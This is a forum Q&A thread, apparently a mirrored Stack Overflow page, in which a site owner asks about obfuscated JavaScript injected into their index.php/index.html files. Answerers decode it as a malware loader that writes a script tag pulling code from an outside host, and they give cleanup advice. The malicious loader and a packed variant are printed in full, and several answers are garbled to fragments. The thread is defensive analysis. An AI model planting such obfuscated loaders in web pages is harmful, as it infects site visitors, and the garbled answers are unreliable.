Unclear JavaScript code in index.php / index.html files

Question

Unclear JavaScript code in index.php / index.html files

Maybe someone here can help or explain what happened. I just noticed today that on one of my client sites all index.php / index.html were replaced and some obscure javascript code was added. Code below:

<script type="text/javascript">
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; 
var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; 
var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; 
var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; 
var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; 
var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; 
var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; 
var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; 
var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; 
var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; 
var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; 
var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; 
var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; 
var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; 
var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; 
var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; 
var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; 
var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; 
var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; 
var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; 
var usW1446O20="Ow8xN74Ow8xN3e"; 
var JgUg10US="g4Uuq18Ow8xN31";
var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW  1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; 
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");
var KcQGBJKD=unescape;
var nhZE2uSD="cZLH618g4Uuq31";
q9124=this; 
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));
</script>

Can someone explain to me what the code is doing?

Thanks for any help.

+3

javascript html php

Charon Jul 08 '10 at 9:44

source share

7 answers

Matthew Flaschen · Answer 1 · 2010-07-08T09:50:49+0000

This is malware. He introduces:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>

Needless to say, I do not recommend visiting this domain.

script - . , ( ), WrEGuKeo () KcQGBJKD(CvhvkAeR) ( ). KcQGBJKD - unescape.

Sarfraz · Answer 2 · 2010-07-08T09:57:04+0000

, php, HTML- OWASP, - .

eval allow_url_fopen php.ini.

:

PHPSecInfo

Lèse majesté · Answer 3 · 2010-07-08T10:07:31+0000

, :

/* ignore this for now, we'll get to it later
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; 
...
var usW1446O20="Ow8xN74Ow8xN3e"; 
var JgUg10US="g4Uuq18Ow8xN31";
*/
var Q8NVsUq5=usW1446O0+usW1446O1+us... // this just concatenates the above

/* this takes the above "gibberish" and turns it into URL-encoding, e.g.:
 * 'Hello%20World' = 'Hello World'
 */
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%"); // replace 'Ow8xN' with '%'

/* give unescape() an alias */
var KcQGBJKD=unescape;

var nhZE2uSD="cZLH618g4Uuq31"; // this is pointless so far as I can tell

/* assign window to q9124 */
q9124=this;

/* WrEGuKeo = window[$something]
 * to get the value of $something, remove all occurrences of Y,1,2,W,l,G,:
 * from the gibberish to get: 'document'
 * so this line actually reads:
 * var WrEGuKeo = window["document"];
 */
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];

/*
 * document.write(unescape($ourUrlEncodedStringAbove));
 */
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));

, URL-, .

: URL-, , . , .

fire · Answer 4 · 2010-07-08T09:51:31+0000

, , , , - .

FTP, script, phpBB, Wordpress .., , .

Matt Healy · Answer 5 · 2010-07-08T09:51:25+0000

. , , ( ?)

Tom gullen · Answer 6 · 2010-07-08T09:49:10+0000

There may be malicious code, make sure that there was no unauthorized access to your FTP, etc., perhaps it is best to go and change all your usernames / passwords, anti-virus scan your computer and restore the old backup of the site.

It should not just change on its own, someone has done it. Here is the code embedded in the decorated:

eval(function (p, a, c, k, e, d) {
e = function (c) {
    return (c35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
    while (c--) {
        d[e(c)] = k[c] || e(c)
    }
    k = [function (e) {
        return d[e]
    }];
    e = function () {
        return '\\w+'
    };
    c = 1
};
while (c--) {
    if (k[c]) {
        p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
    }
}
return p
}('0 A="X";0 j="W";0 i="V";0 h="U";0 e="Y";0 f="T";0 k="13";0 r="12";0 p="11";0 o="10";0 n="14";0 d="P";0 q="J";0 c="K";0 4="I";0 3="L";0 2="S";0 1="M";0 5="R";0 6="Q";0 b="N";0 a="O";0 9="Z";0 7="1q";0 8="1k";0 m="1j";0 x="1i";0 H="1h";0 F="1l";0 D="1m";0 C="1p";0 E="15";0 G="1o";0 B="1n";0 z="1g";0 u="1f";0 19="18";0 t=j+i+h+e+f+k+r+p+o+n+d+q+c+4+3+2+1+5+6+b+a+9+7+8+m+x+H+F+D+C+E+G+B+z+u;l=t.v(/1c/g,"%");0 y=1d;0 A="1e";s=1b;0 w=s["1a".v(/[16\\:]/g,"")];w.17(y(l));', 62, 89, 'var|Qn4KGrEEJXY216|Qn4KGrEEJXY215|Qn4KGrEEJXY214|Qn4KGrEEJXY213|Qn4KGrEEJXY217|Qn4KGrEEJXY218|Qn4KGrEEJXY222|Qn4KGrEEJXY223|Qn4KGrEEJXY221|Qn4KGrEEJXY220|Qn4KGrEEJXY219|Qn4KGrEEJXY212|Qn4KGrEEJXY210|Qn4KGrEEJXY23|Qn4KGrEEJXY24||Qn4KGrEEJXY22|Qn4KGrEEJXY21|Qn4KGrEEJXY20|Qn4KGrEEJXY25|Sdo7QoQybTJs|Qn4KGrEEJXY224|Qn4KGrEEJXY29|Qn4KGrEEJXY28|Qn4KGrEEJXY27|Qn4KGrEEJXY211|Qn4KGrEEJXY26|q9124|ThAyIvzqbEQQ|Qn4KGrEEJXY234|replace|WNWOcwoyad61|Qn4KGrEEJXY225|pX8f6fgPNrOg|Qn4KGrEEJXY233|HYipCnqdJpgI|Qn4KGrEEJXY232|Qn4KGrEEJXY229|Qn4KGrEEJXY228|Qn4KGrEEJXY230|Qn4KGrEEJXY227|Qn4KGrEEJXY231|Qn4KGrEEJXY226|dOUp4s2fOUp4s74OUp4s72|s74OUp4s74OUp4s70OUp4s|2eOUp4s63OUp4s6fOUp4s6|OUp4s66OUp4s2fOUp4s67O|p4s68OUp4s70OUp4s3fOUp|20OUp4s77OUp4s69OUp4s6|4OUp4s74OUp4s68OUp4s3d|4s76OUp4s65OUp4s68OUp4|s3dOUp4s31OUp4s22OUp4s|4s73OUp4s69OUp4s64OUp4|Up4s6fOUp4s2eOUp4s70OU|s22OUp4s68OUp4s74OUp4s|p4s65OUp4s20OUp4s73OUp|Up4s72OUp4s61OUp4s6dOU|OUp4s3cOUp4s69OUp4s66O|OUp4s17OUp4s34|4s72OUp4s63OUp4s3dOUp4|OUp4s22OUp4s31OUp4s30O|Up4s65OUp4s6dOUp4s2eOU|OUp4s79OUp4s73OUp4s74O|fOUp4s2fOUp4s65OUp4s73|74OUp4s70OUp4s3aOUp4s2|p4s73OUp4s65OUp4s72OUp|p4s3dOUp4s22OUp4s30OUp|Y12WlG|write|VzJjJ17OUp4s34|BbdzeevMKHSt|WYd1GoGYc2uG1mYGe2YnltY|this|OUp4s|unescape|CuPm017VzJjJ34|5OUp4s3e|72OUp4s61OUp4s6dOUp4s6|22OUp4s20OUp4s66OUp4s7|s22OUp4s31OUp4s30OUp4s|4s68OUp4s74OUp4s3dOUp4|p4s65OUp4s69OUp4s67OUp|2OUp4s61OUp4s6dOUp4s65|OUp4s62OUp4s6fOUp4s72O|s2fOUp4s69OUp4s66OUp4s|4s22OUp4s3eOUp4s3cOUp4|Up4s64OUp4s65OUp4s72OU|Up4s22OUp4s20OUp4s68OU'.split('|'), 0, {}))

Minh Triet Pham Tran · Answer 7 · 2012-01-02T11:16:45+0000

Here is the javascript code:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>

Unclear JavaScript code in index.php / index.html files

More articles: